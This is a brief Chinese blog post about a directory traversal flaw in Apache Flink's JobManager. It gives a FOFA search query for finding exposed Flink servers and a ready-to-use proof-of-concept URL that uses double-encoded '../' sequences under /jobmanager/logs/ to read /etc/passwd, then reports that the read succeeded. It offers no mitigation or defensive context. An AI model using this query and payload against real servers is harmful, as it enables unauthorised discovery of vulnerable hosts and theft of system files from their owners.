Apache Flink目录遍历漏洞

fofa语法搜索 app="Apache-Flink"

poc:
http://IP:PORT/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

 

 读取成功

 

posted @ 2021-01-07 19:40  !rbash  阅读(333)  评论(0编辑  收藏  举报